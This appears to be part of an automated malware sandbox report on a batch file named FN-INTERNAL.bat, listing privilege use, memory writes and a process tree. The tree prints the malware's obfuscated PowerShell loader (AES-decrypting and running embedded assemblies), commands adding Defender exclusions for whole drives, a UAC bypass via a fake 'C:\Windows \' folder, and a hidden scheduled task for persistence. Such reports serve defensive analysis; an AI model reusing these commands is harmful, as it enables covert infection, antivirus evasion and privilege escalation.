powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 840 powershell.exe Token: SeIncreaseQuotaPrivilege 840 powershell.exe Token: SeSecurityPrivilege 840 powershell.exe Token: SeTakeOwnershipPrivilege 840 powershell.exe Token: SeLoadDriverPrivilege 840 powershell.exe Token: SeSystemProfilePrivilege 840 powershell.exe Token: SeSystemtimePrivilege 840 powershell.exe Token: SeProfSingleProcessPrivilege 840 powershell.exe Token: SeIncBasePriorityPrivilege 840 powershell.exe Token: SeCreatePagefilePrivilege 840 powershell.exe Token: SeBackupPrivilege 840 powershell.exe Token: SeRestorePrivilege 840 powershell.exe Token: SeShutdownPrivilege 840 powershell.exe Token: SeDebugPrivilege 840 powershell.exe Token: SeSystemEnvironmentPrivilege 840 powershell.exe Token: SeRemoteShutdownPrivilege 840 powershell.exe Token: SeUndockPrivilege 840 powershell.exe Token: SeManageVolumePrivilege 840 powershell.exe Token: 33 840 powershell.exe Token: 34 840 powershell.exe Token: 35 840 powershell.exe Token: 36 840 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeIncreaseQuotaPrivilege 4464 powershell.exe Token: SeSecurityPrivilege 4464 powershell.exe Token: SeTakeOwnershipPrivilege 4464 powershell.exe Token: SeLoadDriverPrivilege 4464 powershell.exe Token: SeSystemProfilePrivilege 4464 powershell.exe Token: SeSystemtimePrivilege 4464 powershell.exe Token: SeProfSingleProcessPrivilege 4464 powershell.exe Token: SeIncBasePriorityPrivilege 4464 powershell.exe Token: SeCreatePagefilePrivilege 4464 powershell.exe Token: SeBackupPrivilege 4464 powershell.exe Token: SeRestorePrivilege 4464 powershell.exe Token: SeShutdownPrivilege 4464 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeSystemEnvironmentPrivilege 4464 powershell.exe Token: SeRemoteShutdownPrivilege 4464 powershell.exe Token: SeUndockPrivilege 4464 powershell.exe Token: SeManageVolumePrivilege 4464 powershell.exe Token: 33 4464 powershell.exe Token: 34 4464 powershell.exe Token: 35 4464 powershell.exe Token: 36 4464 powershell.exe Token: SeIncreaseQuotaPrivilege 4464 powershell.exe Token: SeSecurityPrivilege 4464 powershell.exe Token: SeTakeOwnershipPrivilege 4464 powershell.exe Token: SeLoadDriverPrivilege 4464 powershell.exe Token: SeSystemProfilePrivilege 4464 powershell.exe Token: SeSystemtimePrivilege 4464 powershell.exe Token: SeProfSingleProcessPrivilege 4464 powershell.exe Token: SeIncBasePriorityPrivilege 4464 powershell.exe Token: SeCreatePagefilePrivilege 4464 powershell.exe Token: SeBackupPrivilege 4464 powershell.exe Token: SeRestorePrivilege 4464 powershell.exe Token: SeShutdownPrivilege 4464 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeSystemEnvironmentPrivilege 4464 powershell.exe Token: SeRemoteShutdownPrivilege 4464 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
Explorer.EXEpid process 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE 3460 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3460 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exedescription pid process target process PID 2080 wrote to memory of 3216 2080 cmd.exe cmd.exe PID 2080 wrote to memory of 3216 2080 cmd.exe cmd.exe PID 2080 wrote to memory of 4076 2080 cmd.exe cmd.exe PID 2080 wrote to memory of 4076 2080 cmd.exe cmd.exe PID 2080 wrote to memory of 2088 2080 cmd.exe powershell.exe PID 2080 wrote to memory of 2088 2080 cmd.exe powershell.exe PID 2088 wrote to memory of 2532 2088 powershell.exe powershell.exe PID 2088 wrote to memory of 2532 2088 powershell.exe powershell.exe PID 2088 wrote to memory of 1960 2088 powershell.exe cmd.exe PID 2088 wrote to memory of 1960 2088 powershell.exe cmd.exe PID 1960 wrote to memory of 3816 1960 cmd.exe ComputerDefaults.exe PID 1960 wrote to memory of 3816 1960 cmd.exe ComputerDefaults.exe PID 3816 wrote to memory of 4104 3816 ComputerDefaults.exe cmd.exe PID 3816 wrote to memory of 4104 3816 ComputerDefaults.exe cmd.exe PID 4104 wrote to memory of 4952 4104 cmd.exe cmd.exe PID 4104 wrote to memory of 4952 4104 cmd.exe cmd.exe PID 4104 wrote to memory of 3712 4104 cmd.exe cmd.exe PID 4104 wrote to memory of 3712 4104 cmd.exe cmd.exe PID 4104 wrote to memory of 1700 4104 cmd.exe powershell.exe PID 4104 wrote to memory of 1700 4104 cmd.exe powershell.exe PID 1700 wrote to memory of 1992 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 1992 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 2916 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 2916 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 840 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 840 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 4464 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 4464 1700 powershell.exe powershell.exe PID 1700 wrote to memory of 3460 1700 powershell.exe Explorer.EXE PID 1700 wrote to memory of 2164 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2752 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2744 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 3724 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 960 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2928 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1740 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1936 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1928 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2516 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2908 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1724 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 736 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 4868 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1512 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 3856 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1060 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1104 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 3664 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 900 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1092 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2272 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1680 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1076 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2848 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 3436 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1260 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2668 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1452 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1052 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1836 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 652 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1240 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 1632 1700 powershell.exe svchost.exe PID 1700 wrote to memory of 2024 1700 powershell.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:800 -
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:4516
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:4120
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:4516
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2624
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2720
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:2348
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:1396
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:1876
-
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵PID:4220
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:4888
-
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵PID:1608
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca2⤵PID:4968
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:4296
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵PID:4824
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca2⤵PID:3620
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:5112
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca2⤵PID:4436
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:4064
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXxw3e32mpkfkfbh0tznpwwqfw96t0tfx6.mca2⤵PID:1976
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:2736
-
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵PID:5104
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:920
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:4812
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:1448
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1052
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1240
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2848
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3436
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵PID:3216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd6⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"7⤵PID:4952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:3712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵PID:3648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL')4⤵
- Suspicious behavior: EnumeratesProcesses
PID:840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:3552
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:3724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3024
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5fb8948844e2e5d21b84fe506be1d9772
SHA14b9153de351ad607b8f69b372e5e378d3c460ee1
SHA2565f396c4c376cd5683e3d2463740082efab96f1d9d3c8619b1cf365022a91d78a
SHA512db03799cd93abe5079b00e8ec27316b7df9565bddd5315efeadc66dd52b9ab076214a68d9e9a70c83ac45dd4a6c967f980632ca082725750514313b2118903d4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize330B
MD51eebd386377081a211039d5848585777
SHA140469b7a59529e89aed29d852f84354933577225
SHA256d4904f7df0ed447f91c76a5a71516837eb8a7d8333d22c7a89533d2e4a62bf43
SHA51216aeec2990f9c1ebb114b39ba4b8e4afd7cfae72fbaa6ed8de80bc7f63066ab8ec0064e561516da0cee9e788bc08675ae82c55ace3c420b500d049d6cf3b4d51
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5d69723e8354210d28ed15ab0abe84821
SHA1c17c901a5478818c195990f0701b125f9b136d9e
SHA25688c698e4ce35ed3a7c0956cb533f930774ed4f5bbd1cdaa698273b4aed64f348
SHA512fef5a2544544ea90d5c8eba889ca2bf52659ab26c16dd1d31460b176d9287810742f1b70f91c0606566ad5c5e111be5cd771e41d8db574576090f829656c9093
-
Filesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
